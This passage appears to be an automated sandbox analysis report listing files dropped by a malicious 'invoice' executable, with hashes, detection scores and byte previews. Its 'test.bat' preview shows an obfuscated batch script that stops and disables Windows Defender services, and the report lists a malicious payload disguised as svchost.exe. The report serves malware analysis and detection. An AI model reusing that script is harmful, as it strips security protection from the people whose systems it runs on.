                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):16870
                                                                                                Entropy (8bit):3.7816778401859055
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:OdmLQXAmHBUZMXyHpaKsUAeZiQm/u7skS274ItxAJA/:ymLQXxBUZMXyHpalmK/u7skX4ItxAJ+
                                                                                                MD5:27204D728FF664D47266701BE10C22CD
                                                                                                SHA1:5F4140B059B5C27B3A4BA44875E9CA270E38B69B
                                                                                                SHA-256:AE3078760B3575BDC39F8932FB5E5349B60C4947E7D8150FDF5A5257CD22A682
                                                                                                SHA-512:E3EE4D794995F2FFD144B4E8C5EE19BD89BC5EEFEC9DD4853E126EAB3A70860D9E1076BE187B907D441EE21150A9DB4887B3960C551EE2351416D0C8831F66F0
                                                                                                Malicious:false
                                                                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.6.4.2.8.1.3.2.9.5.5.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.6.4.3.2.7.7.3.5.6.4.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.c.5.3.8.e.2.-.7.f.9.a.-.4.4.6.5.-.8.1.5.0.-.c.2.8.f.3.0.8.6.a.0.e.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.3.6.6.5.2.d.-.a.f.b.0.-.4.6.b.4.-.9.c.a.6.-.0.c.9.4.2.1.8.2.1.f.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.N.-.I.n.v.o.i.c.e.-.X.X.X.X.X.9.8.0.8.-.1.9.0.1.1.1.4.3.2.8.7.9.8.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.3.8.-.0.0.0.1.-.0.0.1.b.-.4.2.f.9.-.6.4.6.e.f.0.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.f.5.2.a.f.f.8.5.c.1.f.d.5.6.a.5.9.9.2.9.b.1.a.2.7.2.2.2.a.6.0.0.0.0.0.9.0.4.!.0.0.0.0.e.3.0.5.6.5.d.f.7.c.0.5.9.7.a.7.6.8.5.7.5.3.2.e.4.c.a.7.d.f.6.d.2.7.2.8.e.7.b.
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5540.tmp.WERInternalMetadata.xml
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8494
                                                                                                Entropy (8bit):3.7062826187294062
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:Rrl7r3GLNibKF6i6YraSUqi4jmgmfZyvSH+prW89b/Ssf0g1m:RrlsNibA6i6Y2SUqi4CgmfSSM/Rfi
                                                                                                MD5:AAD18FACDDFA385A8F126A20DC205BA7
                                                                                                SHA1:DB16EF44ED29E5A6FA892812BA11D0EF9B4F6E8A
                                                                                                SHA-256:4EC0E8277B339DB4C21C0683D19FE716FE39C3904D2CBF9B62AD30A590E177CA
                                                                                                SHA-512:E246569CECF1E4ACBDC314FABBEECC6B2157287BA03329DBBB04E1DBB710CA72D094A2C87D903358E1899CD4CF5612F1B4E417F2FDF47699016E41F52B8949C5
                                                                                                Malicious:false
                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.0.0.<./.P.i.d.>.......
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER609C.tmp.xml
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):4800
                                                                                                Entropy (8bit):4.56356179538913
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:cvIwSD8zsDJgtWI9R9C1eWSC8BK8fm8M4JhyFFn+q8v4yqs4HZ6Cid:uITfdtBSNtJEKgfHZ6Cid
                                                                                                MD5:6A4153505DFA6FE8B1EC36DEB7C8AA71
                                                                                                SHA1:5E3422FDE7B0077F5CF56466FB8E833F34DBA089
                                                                                                SHA-256:E538483481395B5E14006F3C1A949BA108A1F24211FD4274E0036E07B826F0E3
                                                                                                SHA-512:A371C290E7DBF68DFB2174511D47E86AA20FD4BEBEC1EE13E95DBF2009B4EE064690CF94425FDEF1B324E5B88F8F4CA929571082174ADF13C60B4F04DB80D0EF
                                                                                                Malicious:false
                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="874062" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER6107.tmp.csv
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):61444
                                                                                                Entropy (8bit):3.076881372976679
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:LyHdAdR34iR8Ah0+OQ1XPS4e6hUJtuE74a0z1Q:LyHdAdR34iR8Ah0+OQ1XPS4e6hUJtuEx
                                                                                                MD5:370BE3D18A0268D960CF98E7E0AE1F0A
                                                                                                SHA1:5FB9D2D61B85B432D94B3F7A8757B78924CA692B
                                                                                                SHA-256:0088D6C317601D641E2D045FD69AAF4226F6D204AEE637750162AF8D2FB8F5B0
                                                                                                SHA-512:3352E41B2AEC0518E837B4D159B1DC20731A94B2DA300A722353CA988A3F6C21D3F40F59B9E2298A5DFA2A434240D42233FF437950BBB7176FBE5D2BC26F400A
                                                                                                Malicious:false
                                                                                                Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER68D8.tmp.txt
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):13340
                                                                                                Entropy (8bit):2.697492408748056
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:9GiZYWzjEiaYsBYHuW/HFiYEZXEZt/icN3svwt08a5Pv1/ifhyIDA3:9jZD6NLE9la5P9qfhVDA3
                                                                                                MD5:935C58D9D20FD50B5407E8B2C31913CC
                                                                                                SHA1:8210182942CB357FD598591A387AA8AD4520C1A3
                                                                                                SHA-256:F7E9C075396E99A941A536A010E15D3F749E0C17C88C7820276ADA73F912F316
                                                                                                SHA-512:49A291618C0397B68C89FDE98525B7833BA577DEE2A73B033E9A6EB06B13A0465FE2FF0F20510B7CD35971F27F8CACC96BA6EC23F220FAEC98AF3C593FA063A1
                                                                                                Malicious:false
                                                                                                Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD8A.tmp.dmp
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Feb 23 14:31:40 2021, 0x1205a4 type
                                                                                                Category:dropped
                                                                                                Size (bytes):328293
                                                                                                Entropy (8bit):3.644711908429586
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:5kTr4m0Wpjd+put0upv5upv9gIOgF550FUCgUE2fO8dTqr1oy9y2J/:A4m0xpRuI9RpD5OTjHujT
                                                                                                MD5:BFD998822CB747DD31588989BD0F29EA
                                                                                                SHA1:158F46F3AD613F55AF153CC5F8CBA1D20A2B2F15
                                                                                                SHA-256:9D9D63C8F547D97D3AA8086FB3881EACE5EE9D932BFCDEA746F7947B76485126
                                                                                                SHA-512:DE4464744FF1914616AD587E925C468B2872433CEA1FD831311D7E7A9CD0D2FDFBA7F2332474106BE0F5ED5DFB4A12A379357CD7C9A06AB29DD3A784B94C4561
                                                                                                Malicious:false
                                                                                                Preview: MDMP....... .........5`...................U...........B......4-......GenuineIntelW...........T.......8.....5`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe
                                                                                                Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):634024
                                                                                                Entropy (8bit):4.356962652008706
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:vLt3NCnZ05Bm8yB0VwxTLZR3yO7wVLTOY2QIDOvbqhUd5H/eIS/VNnUKEAwL:D1VVW0V2ybpTOYIUWfNpa
                                                                                                MD5:E9CD061B2286D8098153C9D9E2ED0B4B
                                                                                                SHA1:E30565DF7C0597A76857532E4CA7DF6D2728E7B5
                                                                                                SHA-256:520FAE27134B14BB92D3858083C08496CEE8B1C7631F0A374C5E168ADFA799F2
                                                                                                SHA-512:6D878D2A3B9A6172196416E8CCA9DC3BF0E73D0D8DA2D37E343938141CC2887EE0DF884F8B7CFB40F912D45C4B6A527313944DDE47ED7590F0FFA54E87C54122
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 27%
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0................. ........@.. ..............................0.....@.....................................W.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4b..PI...........................................................*".(.....*.s.........s.........s.........s.........*B.(.......(.....*...0...........rX..p....r\..p....s........+... .......(...+o,.......88.......(-...........(........(.................(/...o%...&.....(0...........:...................o'.........o1.......8........*........$.j........0...........rh..p....r~..p....s........+...#.......(...+o,.......88.......(-...........(........(.................(/...o%..
                                                                                                C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe:Zone.Identifier
                                                                                                Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview: [ZoneTransfer]....ZoneId=0
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):18114
                                                                                                Entropy (8bit):5.004635661051711
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:XHpib44EdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:XHUYV3IpNBQkj2Yh4iUxZvuiOOdBCNZt
                                                                                                MD5:A0C8D9E005902D2613420FB7F31882AE
                                                                                                SHA1:63B6F34FDE314DB3789AF6FBAE8DC88560DF5122
                                                                                                SHA-256:A914A12BCDA0C56944E9B796E4989B5072867E1CB61D1C2240C8F60E69904D67
                                                                                                SHA-512:069C98F6930730EC12A11435DA26F798426C9639AA69C58529773346C240494E8DF5A5CEB9D1D7380E324E9A113FFE215DA2D276478A60BB2BF5DB5B0D6196FA
                                                                                                Malicious:false
                                                                                                Preview: PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):22300
                                                                                                Entropy (8bit):5.601282691739982
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:TtCD3C02NNRf0Ys/SBKnyTultIoHD7Y9gtcbeR21BMrmvZSRV7++IO9f64I+iq0:1NDfZU4KyTultpH3t0e9+ASs0
                                                                                                MD5:90EF097F86AD22125BF947D518C7656A
                                                                                                SHA1:B5CD1B6388C182CEDCB9F1A06BB85B9C63E93F06
                                                                                                SHA-256:ADD7201ED52147675CB6C2F6264F8E9D2F64B3F5FBD66CE22E489AD743426ABE
                                                                                                SHA-512:6677095B226C5FEF65A51DBCBFBCDFBD80CA4F9C34FF9A81A51B9A70CC5DFDE557E2E8DB3EFD5796A63485F79E22C7118576B9EBF5745F50FDF42EC6DE576207
                                                                                                Malicious:false
                                                                                                Preview: @...e...................................,............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe
                                                                                                Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):91000
                                                                                                Entropy (8bit):6.241345766746317
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: PURCHASE ITEMS.exe, Detection: malicious, Browse
                                                                                                • Filename: CN-Invoice-XXXXX9808-19011143287992.exe, Detection: malicious, Browse
                                                                                                • Filename: quotation_PR # 00459182..exe, Detection: malicious, Browse
                                                                                                • Filename: PURCHASE ORDER CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                • Filename: PO#87498746510.exe, Detection: malicious, Browse
                                                                                                • Filename: TT.exe, Detection: malicious, Browse
                                                                                                • Filename: TT.exe, Detection: malicious, Browse
                                                                                                • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse
                                                                                                • Filename: Download_quotation_PR #371073.exe, Detection: malicious, Browse
                                                                                                • Filename: CN-Invoice-XXXXX9808-19011143287990.exe, Detection: malicious, Browse
                                                                                                • Filename: PurchaseOrdersCSTtyres004786587.exe, Detection: malicious, Browse
                                                                                                • Filename: 3zKVfxhs18.exe, Detection: malicious, Browse
                                                                                                • Filename: AWB783079370872.docm, Detection: malicious, Browse
                                                                                                • Filename: DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exe, Detection: malicious, Browse
                                                                                                • Filename: CN-Invoice-XXXXX9808-19011143287990.exe, Detection: malicious, Browse
                                                                                                • Filename: Payment Advice 170221.exe, Detection: malicious, Browse
                                                                                                • Filename: Payment Receipt.jar, Detection: malicious, Browse
                                                                                                • Filename: miner.exe, Detection: malicious, Browse
                                                                                                • Filename: 875666665.xlsm.xlsm, Detection: malicious, Browse
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat
                                                                                                Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):8399
                                                                                                Entropy (8bit):4.665734428420432
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                Malicious:false
                                                                                                Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpz2dk3x.2yu.psm1
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkbamsn2.eco.psm1
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqb3zhdy.zix.ps1
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2jt1302.10x.ps1
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
